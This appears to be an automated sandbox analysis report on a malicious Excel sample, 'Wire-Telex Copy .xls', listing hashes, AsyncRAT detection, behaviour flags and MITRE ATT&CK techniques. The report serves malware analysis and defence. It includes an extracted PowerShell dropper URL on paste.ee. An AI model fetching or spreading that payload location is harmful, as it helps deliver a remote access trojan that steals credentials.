General

  • Target

    Wire-Telex Copy .xls

  • Size

    136KB

  • Sample

    201005-bytl8tqkt2

  • MD5

    3b41c3d33589de59952989dafd18f0a7

  • SHA1

    c37dc779c64fdad0a1c7e79de2ca7d26c754e0c2

  • SHA256

    490cb5121a4ce0761111fe088bccdc6de5ce78ff082a356a4a39ee169b428491

  • SHA512

    893b487dac90f1856d7a47fd639a45ae95e4cf4ba244b4f4d68fe3f93da1e6252ad79367ce08da0f93905a7aa4f725c5b915799f54a840b16dfdb6d2305c1812

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://paste.ee/r/v5e8E

Targets

    • Target

      Wire-Telex Copy .xls

    • Size

      136KB

    • MD5

      3b41c3d33589de59952989dafd18f0a7

    • SHA1

      c37dc779c64fdad0a1c7e79de2ca7d26c754e0c2

    • SHA256

      490cb5121a4ce0761111fe088bccdc6de5ce78ff082a356a4a39ee169b428491

    • SHA512

      893b487dac90f1856d7a47fd639a45ae95e4cf4ba244b4f4d68fe3f93da1e6252ad79367ce08da0f93905a7aa4f725c5b915799f54a840b16dfdb6d2305c1812

    Score
    10/10
    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blacklisted process makes network request

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

1
T1005

Tasks